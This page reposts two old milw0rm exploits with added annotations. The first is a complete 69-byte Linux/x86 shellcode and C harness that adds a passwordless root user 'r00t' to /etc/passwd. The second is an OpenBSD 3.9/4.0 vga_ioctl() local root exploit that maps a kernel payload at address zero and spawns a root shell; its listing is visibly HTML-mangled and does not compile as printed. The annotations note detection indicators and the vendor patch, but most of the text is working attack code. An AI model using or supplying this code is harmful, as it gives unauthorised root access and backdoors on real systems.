
Exploit di linux/x86

/* By Kris Katterjohn 11/14/2006

*

* 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd

*

* for Linux/x86

*

*

*

* section .text

*

* global _start

*

* _start:

*

* ; open("/etc//passwd", O_WRONLY | O_APPEND)

*

* push byte 5

* pop eax

* xor ecx, ecx

* push ecx

* push 0x64777373

* push 0x61702f2f

* push 0x6374652f

* mov ebx, esp

* mov cx, 02001Q

* int 0x80

*

* mov ebx, eax

*

* ; write(ebx, "r00t::0:0:::", 12)

*

* push byte 4

* pop eax

* xor edx, edx

* push edx

* push 0x3a3a3a30

* push 0x3a303a3a

* push 0x74303072

* mov ecx, esp

* push byte 12

* pop edx

* int 0x80

*

* ; close(ebx)

*

* push byte 6

* pop eax

* int 0x80

*

* ; exit()

*

* push byte 1

* pop eax

* int 0x80

*/



/*
 * Harness for the 69-byte payload whose assembly is listed in the comment
 * above.  The bytes are placed in an automatic (stack) array and then
 * called through a function-pointer cast, so this only runs where the
 * stack is executable; with the non-executable-stack default of current
 * toolchains and kernels the call is expected to fault instead.
 *
 * Per the listing above the payload does open("/etc//passwd",
 * O_WRONLY|O_APPEND), write("r00t::0:0:::", 12), close, exit.  The
 * appended record -- empty password field, uid 0 -- is the indicator to
 * look for when monitoring /etc/passwd integrity; since the file is
 * opened for writing, the record can only land if the calling process
 * already has write access to /etc/passwd (root on a default install).
 *
 * Not a conforming program as written: implicit-int main() (pre-C99) and
 * no return statement.
 */
main()

{

/* 69 bytes: five lines of 12 plus a final line of 9, matching the size in the header comment. */
char shellcode[] =

"\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68"

"\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66"

"\xb9\x01\x04\xcd\x80\x89\xc3\x6a\x04\x58\x31\xd2"

"\x52\x68\x30\x3a\x3a\x3a\x68\x3a\x3a\x30\x3a\x68"

"\x72\x30\x30\x74\x89\xe1\x6a\x0c\x5a\xcd\x80\x6a"

"\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80";



/* Jump into the array; requires the stack page to be mapped executable. */
(*(void (*)()) shellcode)();

}



// milw0rm.com [2006-11-17]


linux/x86 add root user r00t with no password to /etc/passwd 69 bytes




Exploits di mesin OpenBSD  

/* 



Critical Security OpenBSD 3.x-4.0 vga_ioctl() root exploit



Bug had been discovered by allmighty Ilja van Sprundel (ilja.netric.org)

Some code had been stolen from noir's openbsd exploit sources



Fix is available:

ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.0/i386/007_agp.patch



Critical Security [http://www.critical.lt], Lithuania, Vilnius, 2007



Linkejimai neegzistuojancio fronto kariams ;]

*/



#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include



#define TARGET1 "\x51\x47\x48\xd0" /* 0xd0484751 obsd 4.0 generic i386*/

#define TARGET2 "\xa9\x42\x10\xd0" /* 0xd01042a9 obsd 3.9 generic i386*/



/*
 * Kernel-mode payload for the vga_ioctl()/agp bug named in the file
 * header.  Layout as annotated by the author: a run of "\x18\x00\x00\x00"
 * words (labelled "jmp 0x00000018"), the stub labelled "p_cred u_cred
 * shellcode", then the four bytes of TARGET1 followed by "\xff\xe0".
 *
 * main() overwrites four bytes at offset 24+5..24+8 with the value it
 * reads from kp.kp_eproc.e_paddr for its own pid (see get_proc()); the
 * per-target for() loops in main() are HTML-mangled in this listing, so
 * whether and how TARGET2 is substituted cannot be confirmed from what
 * is printed.
 *
 * The embedded kernel addresses make this strictly version-specific
 * (OpenBSD 4.0 / 3.9 generic i386 per the TARGET comments); the vendor
 * fix is the patch linked in the file header.
 */
char shellcode[]=

"\x18\x00\x00\x00"

"\x18\x00\x00\x00"

"\x18\x00\x00\x00" /* some crap */

"\x18\x00\x00\x00"

"\x18\x00\x00\x00"



"\x18\x00\x00\x00" /* jmp 0x00000018 */



"\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad"

"\xde\xad\xde\xef\xbe\x90\x90\x90\x5f\x8b\x0f\x8b" /* p_cred u_cred shellcode */

"\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89\x42\x04"



"\xb8\x51\x47\x48\xd0" /* TARGET1 bytes, verbatim */

"\xff\xe0";



/*
 * Print the command-line synopsis and the list of valid target numbers
 * to stdout, then terminate the process with status 0.  Never returns.
 */
void usage()

{

static const char *const help_lines[] = {
"Usage: crit_obsd_ex target\n\n",
"valid targets:\n",
"(1)\tobsd 4.0 generic i386\n",
"(2)\tobsd 3.9 generic i386\n\n",
};

size_t k;

for (k = 0; k < sizeof help_lines / sizeof help_lines[0]; k++) {

fputs(help_lines[k], stdout);

}

exit(0);

}



/*
 * Fetch the kinfo_proc record for `pid` through
 * sysctl(CTL_KERN, KERN_PROC, KERN_PROC_PID, pid) into *kp.  main() only
 * consumes kp->kp_eproc.e_paddr from the result, which it then patches
 * into the payload as a kernel address.  On sysctl failure the message
 * is printed and the process exits with -1.
 *
 * NOTE(review): this listing is HTML-mangled -- the comparison operator
 * in the if() is gone and the sysctl() call has fewer arguments than
 * the function takes (`len` is computed but never passed, which suggests
 * an `&`-prefixed argument was stripped) -- so it does not compile as
 * printed.
 */
void get_proc(pid_t pid, struct kinfo_proc *kp)

{

u_int arr[4], len;



/* MIB for kern.proc.pid.<pid> */
arr[0] = CTL_KERN;

arr[1] = KERN_PROC;

arr[2] = KERN_PROC_PID;

arr[3] = pid;

len = sizeof(struct kinfo_proc);

/* mangled line: comparison lost, `len` not passed */
if(sysctl(arr, 4, kp, NULL, 0) 0) {

perror("sysctl");

printf("this is an unexpected error, rerun!\n");

exit(-1);

}

}



/*
 * Exploit driver.  Flow as printed: banner; choose a target from av[1]
 * (1 or 2, anything else -> usage()); look up this process's kinfo_proc;
 * patch the value of kp.kp_eproc.e_paddr into the payload; write the
 * payload to "/tmp/. " (note the trailing space in the name) and mmap()
 * that file with MAP_FIXED at address 0, PROT_READ|PROT_EXEC; open
 * AGP_DEVICE and issue ioctl 0x80044103 with a NULL argument; then
 * seteuid(0)/setuid(0), print the resulting ids and exec /bin/sh with
 * argv[0] "cyber".
 *
 * NOTE(review): HTML extraction has destroyed several lines -- the
 * `if (ac` argument-count check, both `for(i=0;i` loops (their bodies
 * are gone entirely), the get_proc() call (its second argument is
 * missing), the four byte-patching assignments (shift/mask operators
 * lost), and the `if(fd`/lseek error checks -- so this does not compile
 * as printed and the per-target loop behaviour can only be guessed.
 *
 * Observations from the visible code, for anyone assessing exposure or
 * looking for traces: the technique depends on the zero page being
 * mappable (MAP_FIXED at address 0) and on read/write access to
 * AGP_DEVICE; the payload file "/tmp/. " is never unlinked; the id
 * printout and an interactive shell named "cyber" are the visible
 * results.  Code-quality issues as written: sizeof printed with %d and
 * a pointer with %x (both undefined behaviour per the C standard), the
 * return values of write() and the ioctl syscall are ignored, and main
 * falls off the end without a return.
 */
int main(int ac, char *av[])

{

int i;

void *p;

int fd,failas;

u_long pprocadr;

struct kinfo_proc kp;



printf("\n+--------------------------------------------+\n");

printf("| Critical Security local obsd root |\n");

printf("+--------------------------------------------+\n\n");



/* mangled: argument-count check lost */
if (ac usage();

if(atoi(av[1])==1)

{

/* mangled: loop condition and body lost */
for(i=0;i

}

else if(atoi(av[1])==2)

{

/* mangled: loop condition and body lost */
for(i=0;i

}

else {usage();}



/* mangled: second argument (the kinfo_proc out-parameter) lost */
get_proc((pid_t) getpid(),

pprocadr = (u_long) kp.kp_eproc.e_paddr;



/* mangled: shift and mask operators lost; intent is to store pprocadr byte-wise at offsets 29..32 */
shellcode[24+5] = pprocadr 0xff;

shellcode[24+6] = (pprocadr 8) 0xff;

shellcode[24+7] = (pprocadr 16) 0xff;

shellcode[24+8] = (pprocadr 24) 0xff;



/* %d with a size_t argument is undefined behaviour; %zu is the matching specifier */
printf("[~] shellcode size: %d\n",sizeof(shellcode));



/* file name is "/tmp/." followed by a space; it is never removed */
fd=open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR);

/* mangled: comparison lost */
if(fd 0)

err(1, "open");



/* return value of write() unchecked */
write(fd, shellcode, sizeof(shellcode));

/* mangled: comparison lost */
if((lseek(fd, 0L, SEEK_SET)) 0)

err(1, "lseek");



/* MAP_FIXED at address 0: requires that the zero page be mappable */
p=mmap(0, sizeof(shellcode), PROT_READ|PROT_EXEC, MAP_FIXED, fd, 0);

if (p == MAP_FAILED)

err(1, "mmap");



/* %x with a pointer argument is undefined behaviour; %p is the portable form */
printf("[~] map addr: 0x%x\n",p);

printf("[~] exploiting...\n");

/* open() result and ioctl return are not checked */
failas = open(AGP_DEVICE, O_RDWR);

syscall(SYS_ioctl, failas, 0x80044103, NULL);



close(failas);

close(fd);



seteuid(0);

setuid(0);

printf("[~] uid: %d euid: %d gid: %d \n", getuid(), geteuid(),getgid());

execl("/bin/sh", "cyber", NULL);



}



// milw0rm.com [2007-01-07]



